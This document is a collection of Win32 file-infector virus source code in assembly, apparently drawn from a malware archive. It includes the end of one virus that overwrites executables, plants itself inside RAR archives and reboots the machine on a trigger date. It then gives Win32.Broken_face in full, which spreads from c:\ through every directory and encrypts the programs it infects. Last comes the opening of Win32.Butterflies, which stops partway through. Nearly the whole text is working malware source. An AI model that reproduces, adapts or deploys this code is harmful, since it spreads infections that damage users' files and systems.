db 076h,02eh,081h,01ah,038h,0d4h,00ch,038h,09bh,070h,02ah,088h,078h,086h,074h
db 02eh,081h,014h,038h,0f1h,019h,0fbh,03eh,070h,02ah,03ch,038h,0fbh,03eh,060h
db 02ah,03ch,038h,0fbh,03eh,062h,02ah,03ch,038h,086h,05bh,029h,081h,09ah,02ah
db 088h,078h,0f1h,019h,0d5h,04ah,0c1h,0d0h,034h,03ah,083h,0aeh,02eh,081h,038h
db 038h,0d4h,0d8h,03ch,085h,033h,03bh,0d4h,057h,03eh,080h,03eh,07ah,00fh,0f1h
db 0a5h,0f5h,01dh,0bfh,0f6h,0b3h,0ech,0bbh,0d6h,03ch,0bfh,0e1h,03dh,0bbh,0fdh
db 039h,084h,038h,07eh,0f5h,01dh,086h,05fh,02dh,085h,09eh,02eh,0d0h,0efh,03bh
db 09fh,0b4h,02eh,0b1h,02ah,0b6h,02eh,08ch,07ch,081h,01eh,038h,086h,04ch,02eh
db 0f5h,01dh,081h,014h,038h,082h,040h,02eh,0d0h,085h,03bh,09fh,098h,02eh,0b1h
db 02ah,09ah,02eh,08ch,07ch,081h,02ch,038h,086h,0aeh,02eh,0f5h,01dh,0ffh,03ah
db 0b4h,02eh,038h,03ch,0ffh,03ah,0b6h,02eh,038h,03ch,0ffh,03ah,098h,02eh,038h
db 03ch,0ffh,03ah,09ah,02eh,038h,03ch,08ch,07ch,081h,09ah,02ah,086h,05bh,029h
db 0f5h,01dh,0ffh,03ah,04eh,02eh,038h,03ch,08ch,07ch,081h,038h,038h,086h,04ch
db 02eh,0f5h,01dh,0d1h,0e1h,0c4h,012h,0fch,002h,08ah,02eh,016h,0b6h,036h,094h
db 02ah,01ah,0b0h,071h,03ch,0ffh,005h,071h,062h,049h,03bh,0d5h,0d7h,0c7h,005h
db 066h,075h,049h,03bh,0d5h,0dfh,0c7h,0b8h,002h,02ah,030h,07bh,049h,03bh,0d5h
db 046h,0c7h,004h,0bch,04dh,03fh,0d1h,0a0h,0c5h,07ch,04dh,03fh,0d1h,0f0h,0c4h
db 0bch,006h,02eh,034h,07eh,04dh,03fh,0d1h,000h,0c6h,0bch,006h,02eh,034h,07dh
db 04dh,03fh,0d1h,01dh,0c7h,0bch,006h,02eh,034h,06eh,04dh,03fh,0d1h,08ch,0c6h
db 0d5h,0b4h,0c0h,069h,085h,021h,03ch,0d0h,021h,039h,039h,078h,03ch,092h,065h
db 0dah,0ceh,0fbh,035h,038h,031h,032h,01ch,063h,077h,06dh,07dh,06ah,07dh,070h
db 065h,018h,00dh,016h,00dh,018h,05eh,041h,01ch,071h,052h,04ch,00dh,00bh,054h
db 017h,075h,073h,064h,065h,01ch,015h,01ch,06fh,04eh,051h,048h,04ch,059h,056h
db 01ch,051h,052h,018h,06ch,059h,04eh,059h,05bh,04dh,05dh,041h,01ch,015h,01ch
db 068h,050h,05dh,05dh,04bh,059h,018h,04eh,05dh,05bh,051h,04fh,04ch,059h,04ah
db 01dh,018h,031h,032h,018h,07ch,073h,06bh,01ch,071h,052h,05eh,059h,05bh,048h
db 051h,053h,056h,01ch,075h,05dh,05bh,054h,051h,052h,05dh,03eh,061h,0d5h,087h
db 033h,018h,070h,05dh,05dh,04ah,052h,018h,04fh,057h,051h,05dh,01ch,05fh,049h
db 059h,04eh,059h,052h,099h,01ch,04fh,053h,04ah,058h,04bh,01dh,002h,077h,04dh
db 05dh,04ah,05dh,050h,045h,005h,06fh,04dh,052h,018h,01ch,079h,098h,098h,001h
db 07ch,059h,04eh,055h,054h,01ch,018h,077h,04dh,098h,098h,001h,06fh,053h,055h
db 05dh,056h,01ch,086h,074h,037h,059h,040h,059h,05bh,053h,055h,04fh,041h,04fh
db 057h,05eh,052h,05eh,059h,048h,057h,04ah,054h,05dh,04ah,056h,04ah,05dh,04ah
db 06eh,035h,07dh,022h,03ch,016h,0c3h,03eh,06eh,033h,084h,039h,06bh,081h,00bh
db 046h,0bch,0d9h,0dch,0b8h,0f5h,026h,086h,0b9h,019h,0a4h,012h,0c7h,022h,02bh
db 030h,0fbh,01ch,07dh,011h,055h,05dh,051h,050h,018h,051h,05dh,006h,018h,075h
db 056h,048h,009h,00fh,050h,07ch,059h,052h,04ch,055h,04bh,053h,05bh,055h,059h
db 050h,016h,05fh,057h,051h,018h,084h,038h,07eh,0d3h,03fh,080h,03eh,07ah,00fh
db 0f1h,0a5h,0f5h,01dh,0fbh,032h,036h,023h,03fh,0ffh,06ah,06bh,0ddh,07ch,082h
db 056h,038h,0cbh,0dah,039h,03bh,039h,087h,087h,02fh,0bfh,0eah,03ch,0cfh,0cbh
db 0b3h,0feh,0cfh,0ddh,0cfh,0cbh,067h,066h,078h,0ffh,016h,0bch,006h,096h,038h
db 06fh,04dh,074h,016h,0c2h,03eh,097h,038h,012h,0b8h,002h,093h,03ch,030h,04ah
db 003h,022h,068h,06fh,00bh,0fch,0b6h,0e4h,099h,0b8h,038h,0b7h,026h,0bah,038h
db 012h,09bh,0e7h,03ch,012h,0b1h,022h,0e5h,038h,016h,09fh,02bh,030h,016h,0b5h
db 026h,029h,034h,0c6h,0ffh,03ah,0bch,03ch,0a9h,038h,0b4h,032h,0beh,03ch,0c3h
db 012h,0feh,03ah,093h,03ch,038h,012h,0feh,03ah,092h,03ch,076h,067h,060h,023h
db 0d1h,0ffh,0cch,0d4h,0bfh,0c3h,0b1h,012h,039h,03eh,0b9h,0d1h,0fah,03dh,0b1h
db 012h,007h,03ch,0dch,07ch,0beh,0dch,0dch,07ch,09bh,035h,03ah,00fh,0ceh,083h
db 05bh,029h,081h,007h,014h,0cfh,09ch,082h,04ah,02bh,099h,035h,03ah,085h,073h
db 034h,009h,038h,07eh,07ah,0dah,0c6h,0dch,07ch,0beh,0dch,0dch,07ch,09bh,07bh
db 038h,085h,014h,03dh,0d0h,073h,0c7h,083h,07dh,03ch,005h,058h,038h,04bh,037h
db 08dh,039h,084h,0b9h,008h,093h,083h,081h,031h,080h,00dh,03ch,097h,0d3h,01dh
db 005h,0f4h,038h,04bh,037h,08dh,03ah,084h,0b9h,010h,093h,083h,081h,031h,080h
db 03dh,03ch,097h,0d3h,031h,089h,03fh,080h,0bdh,03ch,097h,087h,085h,035h,084h
db 011h,038h,093h,00eh,0d5h,083h,006h,03ch,069h,085h,0c7h,03ch,0d0h,037h,0c7h
db 065h,004h,06ch,04fh,029h,088h,087h,092h,083h,071h,03ch,080h,07fh,07bh,097h
db 087h,07ah,038h,082h,05ah,02ch,03bh,0cdh,09ch,0d7h,014h,000h,098h,04bh,02dh
db 08ch,086h,096h,087h,075h,038h,084h,07eh,07ah,093h,083h,07eh,03ch,086h,059h
db 028h,03fh,0c9h,098h,0d3h,02fh,088h,083h,092h,083h,071h,03ch,080h,07bh,07fh
db 097h,087h,07ah,038h,082h,050h,02ch,03bh,0cdh,09ch,00fh,0ceh,083h,05bh,029h
db 081h,071h,038h,0cfh,09ch,082h,05bh,029h,0b9h,0fah,075h,03ch,099h,07bh,038h
db 085h,0e0h,03ch,009h,038h,07eh,07ah,0dah,0c6h,016h,0bch,006h,02eh,034h,05eh
db 04dh,037h,086h,05fh,02dh,0bdh,0feh,003h,038h,0fbh,03ch,071h,044h,0ffh,086h
db 08ah,02ch,0bdh,034h,01ch,018h,0bfh,074h,03eh,018h,083h,0c2h,037h,086h,08ah
db 02ch,0bdh,0c7h,02eh,034h,04bh,00fh,085h,03bh,03ch,0cbh,09ah,04dh,0cch,0b9h
db 0c3h,0c5h,037h,04ch,00dh,0b9h,0c3h,038h,030h,04ch,013h,0b9h,0c3h,03bh,030h
db 04ch,011h,0b9h,0c3h,03eh,030h,04ch,017h,0b9h,0c3h,031h,030h,04ch,015h,0b9h
db 0c3h,034h,030h,04ch,01bh,0b9h,0c3h,037h,030h,04ch,019h,0b9h,0c3h,02ah,030h
db 04ch,01fh,0feh,03ah,02ah,030h,060h,0c5h,0fbh,08ch,07dh,0d7h,022h,08ch,07bh
db 0d7h,02eh,08ch,06bh,0d7h,02ah,08ch,077h,0d7h,036h,08ch,07ah,0d7h,032h,08ch
db 07dh,0d7h,03eh,08ch,079h,0d7h,03ah,08ch,06ah,09eh,02ah,030h,0b6h,0e7h,0c0h
db 0ffh,08ch,003h,081h,03fh,038h,086h,07ah,02eh,0f5h,01dh,0b3h,02ah,07bh,02eh
db 098h,07eh,02ah,0ffh,06bh,06dh,06eh,06bh,0d0h,009h,038h,086h,0c7h,0c3h,080h
db 0c3h,0c7h,017h,0e3h,0b6h,024h,07ah,00ah,0e4h,0e9h,0dfh,0e9h,0dfh,0b2h,0f8h
db 0b2h,0deh,0b2h,0eah,00ah,0cah,00bh,0bbh,003h,014h,00bh,0abh,005h,014h,071h
db 049h,0dah,0bfh,0cah,0c3h,00dh,0c3h,0c7h,063h,066h,065h,063h,0ffh,080h,0f1h
db 02bh,0b0h,0f3h,0f3h,068h,06dh,06ah,06bh,087h,007h,010h,00fh,0f1h,00fh,0eah
db 00fh,0f8h,0b6h,0f9h,06dh,081h,034h,038h,0c4h,0e9h,0e6h,0e9h,0e4h,04bh,03bh
db 0b9h,0ceh,080h,0d1h,00dh,01ch,0bbh,0deh,0c8h,0b5h,03dh,0b5h,06dh,03eh,0bbh
db 0fbh,03ch,065h,079h,0bdh,0c1h,03ch,039h,049h,0eeh,063h,062h,065h,060h,0ffh
db 026h,06ah,068h,06fh,0a4h,064h,0b8h,0d8h,0c6h,06ch,0a5h,017h,0f8h,0b2h,0e0h
db 087h,03ch,03ch,0fdh,00bh,0feh,038h,0f7h,067h,060h,062h,027h,0ffh,0a4h,012h
db 0c7h,022h,0a4h,03dh,04bh,03fh,0d1h,0abh,038h,01ah,0b9h,083h,073h,03ch,0dah
db 0cbh,04dh,03fh,0d1h,09fh,0cah,01ah,0b9h,043h,02bh,07ch,033h,048h,03bh,0d5h
db 0b8h,03ch,0a4h,06ch,06bh,06dh,06ah,06ah,06fh,012h,0feh,03ah,091h,03ch,07eh
db 03ah,026h,03ah,027h,032h,03fh,0b1h,04fh,03fh,087h,03fh,038h,085h,003h,03ch
db 0cbh,098h,027h,03bh,0d0h,04fh,038h,084h,039h,03fh,013h,0eeh,081h,03dh,068h
db 0a0h,016h,0c3h,026h,0a0h,039h,084h,039h,03fh,0a4h,012h,0c7h,022h,0a4h,03dh
db 03eh,032h,03fh,012h,0feh,03ah,02ah,030h,05ah,069h,026h,03ah,085h,033h,03ah
db 0d4h,043h,0c1h,03fh,023h,065h,084h,031h,03fh,081h,03eh,068h,087h,05bh,02bh
db 0a4h,012h,0c7h,022h,0a4h,03dh,080h,035h,03bh,0a0h,016h,0c3h,026h,0a0h,039h
db 084h,039h,03fh,081h,03dh,038h,00fh,0eah,087h,05bh,029h,0a4h,012h,0c7h,022h
db 0a4h,03dh,03fh,063h,066h,066h,061h,067h,060h,0a1h,0f2h,03eh,038h,03fh,06ah
db 053h,050h,05dh,051h,054h,09bh,01ch,068h,05dh,04ah,05dh,05fh,049h,059h,045h
db 019h,03fh,026h,03ah,06bh,032h,036h,023h,03fh,00fh,0f8h,0b2h,0e0h,082h,040h
db 03ch,087h,033h,010h,099h,09dh,0b2h,0f8h,083h,040h,03ch,080h,050h,028h,097h
db 0b4h,0f4h,093h,032h,036h,023h,03fh,083h,02bh,014h,081h,03dh,03ah,084h,068h
db 03ch,093h,0b7h,0f9h,097h,0c6h,0fdh,0b9h,0c5h,032h,03eh,04eh,0cdh,00bh,0fch
db 0f5h,02fh,080h,036h,03dh,087h,02bh,014h,081h,03dh,068h,00fh,0eah,0f1h,02bh
db 00fh,0f8h,0b2h,0f8h,082h,037h,014h,087h,044h,038h,099h,09dh,067h,03fh,023h
db 0fbh,06ch,06bh,06dh,06ah,06ah,06fh,069h,026h,03ah,036h,032h,027h,03bh,01eh
db 0bch,006h,089h,033h,072h,04dh,02ah,080h,03dh,03ah,087h,08eh,02eh,081h,03dh
db 038h,086h,0b8h,03ch,0f5h,02fh,0b9h,083h,073h,03ch,0dah,0cbh,04dh,036h,03fh
db 023h,065h,063h,066h,066h,061h,067h,060h,0f3h,01eh,0fah,03eh,095h,038h,074h
db 01eh,0fah,03eh,089h,033h,065h,087h,01ch,038h,0d4h,085h,0cch,0d3h,0deh,082h
db 0ceh,039h,085h,03eh,03ch,056h,07eh,0dah,0c0h,0d4h,094h,030h,048h,0c3h,0b7h
db 0cbh,085h,038h,03dh,082h,0cch,039h,0cfh,057h,0ffh,00fh,013h,03fh,008h,014h
db 038h,00dh,011h,03dh,0e3h,03ah,019h,03ah,02eh,023h,0c3h,054h,03eh,037h,034h
db 039h,03dh,038h,03ch,098h,00ch,079h,072h,06ch,075h,015h,06ah,071h,06eh,016h
db 078h,079h,068h,038h,07fh,070h,077h,074h,075h,06bh,068h,016h,071h,06bh,03ch
db 07bh,074h,073h,070h,071h,06fh,06ch,012h,07bh,06ch,06bh,03ch,079h,06ah,068h
db 012h,07bh,06eh,07bh,03ch,038h,03ch,0b8h,03ch,038h,03ch,064h,03ch,038h,03ch
db 054h,03ch,038h,03ch,07bh,006h,064h,07fh,077h,071h,075h,07dh,076h,078h,016h
db 07fh,077h,071h,038h,0b6h,03fh,03ch,0f9h,02ch,039h,03dh,038h,03dh,0a3h,09ch
db 091h,02eh,039h,03ch,039h,03ch,038h,004h,044h,0fah,0feh,050h,0c6h,0fah,0feh
db 0fah,07ch,03ch,038h,03ch,038h,0c4h,044h,05ah,05eh,052h,0c4h,05ah,05eh,042h
db 0c4h,03ch,038h,03ch,038h,004h,044h,0dah,05eh,05eh,058h,05eh,0deh,042h,004h
db 03ch,038h,03ch,038h,0cch,000h,020h,076h,0dah,05eh,05ah,05eh,040h,0c0h,03ch
db 038h,03ch,038h,044h,0c4h,05ah,052h,0c4h,050h,05eh,05eh,0c0h,040h,03ch,038h
db 03ch,038h,040h,0c6h,05eh,058h,054h,0c0h,054h,058h,05ch,0c8h,03ch,038h,03ch
db 038h,040h,0d6h,05ah,05ch,05ch,0dah,05ah,056h,0c2h,04eh,03eh,038h,03ch,038h
db 07eh,05eh,05ah,05eh,0dbh,046h,05ah,05eh,05ah,07ah,03ch,038h,03ch,038h,024h
db 004h,000h,020h,024h,020h,024h,004h,000h,020h,03ch,038h,03ch,038h,03ah,036h
db 032h,07eh,05ah,04eh,05ah,05eh,05ah,004h,03ch,038h,03ch,038h,01eh,05eh,0dah
db 05eh,048h,040h,050h,0deh,05ah,01ah,03ch,038h,03ch,038h,01ch,058h,0dch,058h
db 05ch,05ah,05ah,056h,05ah,0c4h,03ch,038h,03ch,038h,0beh,0fah,0fah,0d6h,0c2h
db 0eeh,0eah,0feh,0fah,07ch,03ch,038h,03ch,038h,0beh,0feh,0dah,0ceh,0e2h,0f6h
db 0fah,0feh,0fah,07ah,03ch,038h,03ch,038h,024h,004h,052h,05eh,05ah,05eh,05ah
db 04eh,000h,020h,03ch,038h,03ch,038h,0cch,044h,052h,05eh,05ah,056h,0c0h,058h
db 05ch,078h,03ch,038h,03ch,038h,00ch,044h,0fah,0feh,0fah,0feh,0fah,0eeh,040h
db 020h,030h,038h,03ch,038h,0c0h,05eh,05ah,05eh,048h,040h,050h,0deh,05ah,01ah
db 03ch,038h,03ch,038h,000h,05eh,05ah,05eh,00eh,020h,030h,01eh,05ah,084h,03ch
db 038h,03ch,038h,018h,046h,0e7h,0a1h,024h,020h,024h,020h,024h,004h,03ch,038h
db 03ch,038h,07eh,05eh,05ah,05eh,05ah,05eh,05ah,05eh,042h,004h,03ch,038h,03ch
db 038h,018h,05eh,05ah,05eh,05ah,05eh,05ah,05eh,000h,020h,03ch,038h,03ch,038h
db 0beh,0feh,0fah,0feh,0eah,0eeh,0c2h,0c6h,0d2h,07ch,03ch,038h,03ch,038h,07eh
db 05eh,000h,020h,024h,020h,024h,004h,05ah,07ah,03ch,038h,03ch,038h,07eh,05eh
db 05ah,004h,024h,020h,024h,020h,024h,004h,03ch,038h,03ch,038h,000h,05eh,07ah
db 034h,024h,044h,00ch,05ah,05ah,004h,03ch,038h,0b6h,03fh,03ch,039h,056h,0c9h
db 01ch,017h,07fh,018h,03ch,038h,048h,038h,0bch,010h,03ch,09eh,02eh,038h,03ch
db 09eh,02eh,038h,03ch,038h,03ch,038h,03ch,038h,0e2h,07dh,01eh,01dh,028h,008h
db 034h,038h,03ch,038h,03ch,038h,079h,077h,072h,071h,012h,07bh,073h,075h,05ch
db 0d2h,03ch,038h,022h,03fh,03dh,038h,02ch,038h,03ch,062h,0e2h,07dh,0bdh,01dh
db 09ah,02ah,03ch,038h,09ah,02ah,03ch,038h,03ch,038h,03ch,038h,03ch,038h,03ch
db 038h,03ch,038h,06dh,07eh,073h,073h,012h,07bh,073h,075h,03ch,038h,03ch,038h
db 03ch,038h,03ch,000h
.CODE
BORGES: push offset SystemTimeStruc
call GetSystemTime
mov ax,word ptr offset [SystemTimeStruc+2]
cmp al,9
jne NoFQVbirthday
mov ax,word ptr offset [SystemTimeStruc+6]
cmp al,17
je Adios
NoFQVbirthday:
push offset Original
push 000000C8h
call GetCurrentDirectoryA
mov dword ptr [Longitud],eax
call GetCommandLineA
push eax
push offset ParaCorrer
call lstrcpyA
mov edi,eax
Buscar: cmp byte ptr [edi],'.'
jz ElPunto
inc edi
jmp Buscar
ElPunto:mov esi,edi
inc esi
mov dword ptr [Posicion],esi
add edi,4
mov byte ptr [edi],00
Carrousell:
jmp InfectEXEs
Volver: push offset PuntoPunto
call SetCurrentDirectoryA
push offset Actual
push 000000C8h
call GetCurrentDirectoryA
cmp eax,dword ptr [Longitud]
je Salida
mov dword ptr [Longitud],eax
jmp Carrousell
InfectEXEs:
push offset Win32FindData
push offset Victimas
call FindFirstFileA
mov dword ptr [SearcHandle1],eax
Ciclo: cmp eax,-1
je Salida
or eax,eax
jnz Continuar
jmp InfectRARs
Continuar:
push offset Hallado
push offset Crear
call lstrcpyA
mov edi,offset Crear
SeguirBuscando:
cmp byte ptr [edi],'.'
jz PuntoEncontrado
inc edi
jmp SeguirBuscando
PuntoEncontrado:
inc edi
mov dword ptr [edi],0004d4f43h
push offset Crear
push offset Hallado
call MoveFileA
push 0
push offset Hallado
push offset ParaCorrer+1
call CopyFileA
push offset Win32FindData
push dword ptr [SearcHandle1]
call FindNextFileA
jmp Ciclo
InfectRARs:
push offset Win32FindData
push offset Victimas2
call FindFirstFileA
mov dword ptr [SearcHandle2],eax
Ciclear:cmp eax,-1
je Salida
or eax,eax
jnz Follow
jmp Volver
Follow: push 00
push 00000080h
push 03
push 00
push 00
push 0c0000000h
push offset Hallado ; Abrir el RAR
call CreateFileA
mov dword ptr [FileHandle],eax
push 02
push 00
push 00 ; Puntero al final
push eax
call SetFilePointer
mov edi,offset RARName
mov ecx,7 ; Get a random name
call Changer
mov esi,offset Kuarahy2
mov edi,Size ; Get CRC
call CRC32
mov dword ptr [RARCrc32],eax
mov esi,offset RARHeader+2
mov edi,HeaderSize-2 ; CRC of the header
call CRC32
mov word ptr [RARHeaderCRC],ax
push 0
push offset Number
push HeaderSize
push offset RARHeader ; Write header
push dword ptr [FileHandle]
call WriteFile
mov word ptr [RARHeaderCRC],0
mov word ptr [RARCrc32],0 ; Blank
mov word ptr [RARCrc32+2],0
push 0
push offset Number
push Size
push offset Kuarahy2 ; Drop viruz
push dword ptr [FileHandle]
call WriteFile
push dword ptr [FileHandle]
call CloseHandle
push offset Win32FindData
push dword ptr [SearcHandle2]
call FindNextFileA
jmp Ciclear
FillClipboard:
push 0
call OpenClipboard
call EmptyClipboard
push (offset TextoVentana-offset TituloVentana)
push 00000002 ; GMEM_MOVEABLE
call GlobalAlloc
push eax
mov dword ptr [MemHandle],eax
call GlobalLock
push eax
push offset TituloVentana
push eax
call lstrcpyA
push dword ptr [MemHandle]
call GlobalUnlock
push dword ptr [MemHandle]
push 00000001 ; CF_TEXT
call SetClipboardData
call CloseClipboard
jmp Run4theNight
Adios: push 00000001
push offset TituloVentana
push offset TextoVentana
push 0
call MessageBoxA
push 0
push 00000002 ; EWX_REBOOT
call ExitWindowsEx
Salida: push offset Original
call SetCurrentDirectoryA
mov ax,word ptr offset [SystemTimeStruc+4]
cmp al,2
je FillClipboard
Run4theNight:
push offset ProcessInfo
push offset StartupInfo
sub eax,eax
push eax
push eax
push 00000010h
push eax
push eax
push eax
call GetCommandLineA
inc eax
push eax
Done: mov esi,dword ptr [Posicion]
mov dword ptr [esi],0004d4f43h
push offset ParaCorrer+1
call CreateProcessA
Out: push 0
call ExitProcess
CRC32: cld ; Routine extracted from Vecna's
push ebx ; Inca virus. Muito brigado!
mov ecx,-1
mov edx,ecx
NextByteCRC:
xor eax,eax
xor ebx,ebx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
NextBitCRC:
shr bx,1
rcr ax,1
jnc NoCRC
xor ax,08320h
xor bx,0edb8h
NoCRC: dec dh
jnz NextBitCRC
xor ecx,eax
xor edx,ebx
dec di
jnz NextByteCRC
not edx
not ecx
pop ebx
mov eax,edx
rol eax,16
mov ax,cx
ret
Changer: mov ebx,25
call GetTickCount ; ¥embo random
mov edx,dword ptr offset [SystemTimeStruc+6]
xor eax,edx
xor edx,edx
div ebx
xchg eax,edx
add eax,65
stosb
loop Changer
ret
Ends
End BORGES
; Brought to you by 'The ZOO' !
Win32/Infector/Win32.Broken_face.asm
+342
View File
@@ -0,0 +1,342 @@
; ___________________
; | Win32.Broken_face |
; | __________________|
; ___________||
;[ Information ]
;First, virus moves to the root directory, and scans for
;directorys.It enters them and checks for executables.If
;no files found or more files needed, then looks in the
;current directory for another subdir. If there isnt any
;it goes back and enters another dir etc etc. Encrypts
;hostfiles ( marked with _ in front of their name ) and
;when its time to execute a host, it decrypts it into a
;file marked with $, executes it, and keeps deleting it
;until the file exits so the decrypted file dissapears.
;Sick method, could not think of anything else, but it
;works fine. Infected hosts keep the original size if
;they are smaller than 8192 bytes.Thats all. Be carefull
;if you think of experimenting with it,spreads faaassst.
.386
.model flat
.data
fuck dd 0
shit dd 0
ftel dd ?
tdata db 318 dup (?)
target dd ?
Nbytes dd 0
newhandle dd ?
depth db 0
filehandle db 40 dup (?)
find_data db 3180 dup (?)
xdata db 318 dup (?)
files2eat db 0eh
xhandle dd 0
msg db "There was this boy",0dh,"who had two chlidren",0dh
db "with his sisters",0dh,"They were his daughters",0dh
db "They were his favourite lovers",0dh,"I got no lips,I got no tounge"
db 0dh,"Where there were eyes there's only space",0dh
db "I got no lips, I got no tounge",0dh,"I GOT A BROKEN FACE!",0
.code
extrn ExitProcess:proc
extrn MessageBoxA:proc
extrn FindFirstFileA:proc
extrn FindNextFileA:proc
extrn SetCurrentDirectoryA:proc
extrn DeleteFileA:proc
extrn FindClose:proc
extrn CreateFileA:proc
extrn GetCurrentDirectoryA:proc
extrn ReadFile:proc
extrn WriteFile:proc
extrn CloseHandle:proc
extrn WinExec:proc
extrn GetCommandLineA:proc
extrn CreateProcessA:proc
start:
sub esp,1024
mov ebp,esp
call GetCommandLineA
inc eax
mov [ftel],eax
laos:
cmp byte ptr [eax],'"'
je monday
inc eax
jmp laos
monday:
mov byte ptr [eax],0
mov dword ptr [fuck],eax
push offset root
call SetCurrentDirectoryA
xor esi,esi ;for find_data
xor edi,edi ;for filehandle
find1stdir:
lea eax,[find_data+esi]
push eax
push offset dirmasker
call FindFirstFileA
mov dword ptr [filehandle+edi],eax
cmp dword ptr [find_data+esi],10h ;check if it is a dir
jne find2nddir
cmp byte ptr [find_data+esi+44],"."
je find2nddir
getin:
lea eax,[find_data+44+esi]
push eax
call SetCurrentDirectoryA
inc byte ptr [depth]
push offset xdata
push offset exefile
call FindFirstFileA
cmp eax,-1
jnz fne1
dam:
add edi,4
add esi,313
jmp find1stdir
fne1:
mov bh,byte ptr [xdata+43]
mov [xhandle],eax
jmp infect
fne2:
mov byte ptr [xdata+43],bh
push offset xdata
mov eax,[xhandle]
push eax
call FindNextFileA
or eax,eax
jz dam
infect:
cmp byte ptr [xdata+44],'_'
je fne2
mov bh,byte ptr [xdata+43]
mov byte ptr [xdata+43],'_'
push offset tdata
push offset xdata+43
call FindFirstFileA
cmp eax,-1
jnz fne2
dmf:
xor edx,edx
push edx
push 2
push 1
push edx
push edx
push 40000000h
push offset xdata+43
call CreateFileA
cmp eax,-1
je end ; failed. back in the box :(
mov [newhandle],eax
xor edx,edx
push edx
push edx
push 3
push edx
push edx
push 80000000h
push offset xdata+44
call CreateFileA
mov [target],eax
mov byte ptr [shit],66
call copyfile
call ftopen
xor edx,edx
push edx
push 80
push 3
push edx
push edx
push 40000000h
push offset xdata+44
call CreateFileA
mov [newhandle], eax
call copyfile
jmp end
getback:
cmp byte ptr [depth],0
je realend
dec byte ptr [depth]
push dword ptr [edi+filehandle]
call FindClose
sub esi,313
sub edi,4
push offset cdback
call SetCurrentDirectoryA
jmp find2nddir
goroot:
xor esi,esi
mov edi,esi
mov byte ptr [depth],0
push offset root
call SetCurrentDirectoryA ;move to c:\
find2nddir:
lea eax,[find_data+esi]
push eax
push dword ptr [filehandle+edi]
call FindNextFileA
or eax,eax
jz getback
cmp dword ptr [find_data+esi],10h
jne find2nddir
cmp byte ptr [find_data+esi+44],'.'
je find2nddir
jmp getin
end:
dec byte ptr [files2eat]
cmp byte ptr [files2eat],0
jne fne2
realend:
call dencrypt
push 5
push dword ptr [ftel]
call WinExec
cmp eax,31
jg fuckup
push 0
push offset tag+1
push offset msg
push 0
call MessageBoxA
jmp deadend
fuckup:
push dword ptr [ftel]
call DeleteFileA
or eax,eax
jz fuckup
deadend:
push 0
call ExitProcess
exefile db '*.exe',0
dirmasker db '*.',0
root db 'c:\',0
cdback db '..',0
tag db '[Broken_face',0,'coded by SuperMovah/MISP]'
copyfile:
push 0
push offset Nbytes
push 1024
push ebp
mov eax,[target]
push eax
call ReadFile
mov eax,[Nbytes]
or eax,eax
jz gbgb
cmp byte ptr [shit],66
je enchost
bck:
push 0
push offset Nbytes
push [Nbytes]
push ebp
mov eax,[newhandle]
push eax
call WriteFile
jmp copyfile
gbgb:
push dword ptr [newhandle]
call CloseHandle
push dword ptr [target]
call CloseHandle
mov byte ptr [shit],0
ret
enchost:
push esi
mov esi,ebp
mov ecx,100h
xor bx,bx
ench:
add bx,cx
xor word ptr [esi],bx
inc esi
inc esi
loop ench
pop esi
mov byte ptr [shit],66
jmp bck
dencrypt:
mov esi,dword ptr [fuck]
Tuesday:
cmp byte ptr [esi],'\'
je google
dec esi
loop Tuesday
google:
inc esi
mov al,byte ptr [esi]
mov byte ptr [esi],'_'
Friday:
inc esi
mov bl,byte ptr [esi]
mov byte ptr [esi],al
cmp byte ptr [esi],0
jz Sunday
inc esi
mov al,byte ptr [esi]
mov byte ptr [esi],bl
cmp byte ptr [esi],0
jnz Friday
Sunday:
call ftopen
mov esi, dword ptr [ftel]
ghho:
inc esi
cmp byte ptr [esi],'_'
jne ghho
mov byte ptr [esi],'$'
xor edx,edx
push edx
push 2
push 1
push edx
push 1
push 40000000h
push dword ptr [ftel]
call CreateFileA
mov [newhandle], eax
mov byte ptr [shit],66
call copyfile
ret
ftopen:
xor edx,edx
push edx
push edx
push 3
push edx
push 1
push 80000000h
push dword ptr [ftel]
call CreateFileA
mov [target],eax
ret
end start
;2-9-2004
Win32/Infector/Win32.Butterflies.asm
+250
View File
@@ -0,0 +1,250 @@
;Win32.Butterflies By Twizter/NuKe
.386p
.model flat ;Setting para el Tasm
.code
;=============================
extrn GetSystemDirectoryA:proc
extrn GetWindowsDirectoryA:proc
extrn lstrcat:proc
extrn ExitProcess:proc
extrn GetModuleHandleA:proc
extrn GetModuleFileNameA:proc
extrn FindFirstFileA:proc
extrn FindNextFileA:proc
extrn CopyFileA:proc
extrn DeleteFileA:proc
extrn MoveFileA:proc
extrn _lopen:proc
extrn _lwrite:proc
extrn _lclose:proc
extrn WinExec:proc
extrn SetFilePointer:proc
extrn GetCurrentDirectoryA:proc
extrn SetCurrentDirectory:proc
extrn _lread:proc
extrn _lcreat:proc
extrn SetCurrentDirectoryA:proc; Declaramos todas las funciones que vayamos a usar
;=============================
include windows.inc
;=============================
_off_ equ 2722d
_scrpt_ equ offset end_script - offset IniData1 ;Declaramos el tamaño del Script.ini
;=============================
begin:
push 00000001 ;modo de ejecucion
push offset cFileName ;nombre del .vxe el cual se guarda en el exe al momento
call WinExec ; de la infeccion
push offset path3 ;Buffer en donde guaradar el Path
push 260 ;Tamaño del buffer
call GetCurrentDirectoryA ;Obtiene el path del programa
push 25 ;Tamaño del buffer
push offset path2 ;Buffer en donde guaradar el Path
call GetWindowsDirectoryA ;obtiene el path de windows
push offset path2
call SetCurrentDirectoryA ;el directorio ahora es el de windows
push offset handle1
call GetModuleHandleA ;obtiene el handle del modulo de la fila que se esta ejecutando
push 50 ;Tamaño del buffer
push offset handle2 ;buffer
push eax ;handle del ejecutable que acabmos de obtener con la funcion anterior
call GetModuleFileNameA ;guardamos el path de este ejcutable en handle2
push offset filedta ;estructura que recibe informacion acerca de los archivos encontrados
push offset maska ; = *.Exe
call FindFirstFileA ;funcion de buscar archivos
mov dword ptr [handle_],eax ;guarda el hadle de la busqueda en _handle
cmp eax, 0 ;si la funcion devolvio un 0 hubo un error o sea que no
je done_this ;hay EXEs para infectar .
check:
; cmp nFileSizeLow, 6000d
; jle nextfile
mov bx, word ptr[cFileName] ;mueve el nombre del archivo encontrado a bx
cmp bx, 'XE' ;mira a ver si empieza por Ex , para no infectar el explorer
je nextfile ;si empieza por ex va por el proximo archivo
cmp bx, 'UR' ;mira a ver si empieza por Ru , para no infectar el RunDllxx
je nextfile ;si empieza por ex va por el proximo archivo
cmp bx, 'ur' ;lo mismo
je nextfile ;igual
cmp bx, 'ME' ;Em , para no infectar el Emm386.Exe
je nextfile ;no lo infecta
